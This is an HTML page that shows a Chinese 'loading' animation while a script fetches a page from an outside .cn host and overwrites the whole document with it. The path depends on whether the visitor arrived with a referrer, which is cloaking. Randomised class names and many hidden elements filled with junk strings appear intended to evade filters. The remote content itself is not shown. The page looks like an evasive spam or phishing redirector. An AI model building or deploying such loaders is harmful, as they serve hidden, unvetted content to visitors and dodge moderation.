<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .DUUiGYXy2 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .DUUiGYXy2 .l0Z1XE06N {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .DUUiGYXy2 .content {
            line-height: 50px;
            text-align: center
        }

        .DUUiGYXy2 .img {
            width: 100%
        }

        .DUUiGYXy2 .wpt1lIuh {
            text-align: center
        }

        .DUUiGYXy2 .wpt1lIuh span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .DUUiGYXy2 .wpt1lIuh span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .DUUiGYXy2 .wpt1lIuh span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .DUUiGYXy2 .wpt1lIuh span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .DUUiGYXy2 .wpt1lIuh span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .DUUiGYXy2 .wpt1lIuh span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .DUUiGYXy2 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Dx3Tb0RgIY(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var YA04WAq = Dx3Tb0RgIY('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ YA04WAq +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ YA04WAq +".html?a=share";
		}
		
        Le86Rvbi=url+"#"+new Date().getTime();
        Le86Rvbi && function() {
            $.get(Le86Rvbi, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >jZmwYy0udx9RkF2JGkPcczLrPvt7pnFWOBjteJeP1qCIp</h1>
<b style='display:none' >DsXptdyoRaIIxaEczM9CzzwPsgK2Vqjs8j8pr8ZPsbOg83cQAa5TyGyxkNTuS5Jaox7bKhOYFSAYPZKdv1ABWQ</b>
<img  src='' style='display:none'>
<b style='display:none' >DsXptdyoRaIIxaEczM9CzzwPsgK2Vqjs8j8pr8ZPsbOg83cQAa5TyGyxkNTuS5Jaox7bKhOYFSAYPZKdv1ABWQ</b>
<ul style='display:none' >dR2XMQe8xNCbecmSU6wFxybuxQjKT9HU1Gj4ls6CNZoM0zCxk8qCDpBmZGbmZqQWetygo2mylvrpuLaqMT</ul>
<p  style='display:none'>leHCXFIxVIEXBpN</p>
<b style='display:none' >DsXptdyoRaIIxaEczM9CzzwPsgK2Vqjs8j8pr8ZPsbOg83cQAa5TyGyxkNTuS5Jaox7bKhOYFSAYPZKdv1ABWQ</b><div class="DUUiGYXy2">
    <div class="l0Z1XE06N">
        <div class="wpt1lIuh">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>HLCa9u1nQ1MMytdNHJAzc6d7bd2kj6835vXCvpxAJvzpbvAOEunK7DTgIz2o6BIajdg5TDOjJB98uYrsAmoMTbT1wmpSU4SuUNr</div>
<ul style='display:none' >HqtMhNMNhzgfuiN5onl5Aecfhw0XbIBmArpdw3ffqm3KdgowWxwiMVEchPWDheoDxV8kZhY</ul>
<a  href='#' style='display:none'>g47rywpGQHIporYSBfVKSjKSVdua</a>
<h1 style='display:none' >gwNEX6I9BizofElUgtKhnBJBcZzZIpeKteavKmIPCDcsysTKwJomkMFRrK789ymM4LqhC6mmkttwiiKq1AIxiRp</h1>
<p  style='display:none'>uy0W0rbLAjcmaWSVzdhyVLJ8uY1K9yNErShtILIazVQTZoiWpLlBm</p>
<h1 style='display:none' >gwNEX6I9BizofElUgtKhnBJBcZzZIpeKteavKmIPCDcsysTKwJomkMFRrK789ymM4LqhC6mmkttwiiKq1AIxiRp</h1>
<b style='display:none' >R7EVOnWi0TMC295er2</b></body>
</html>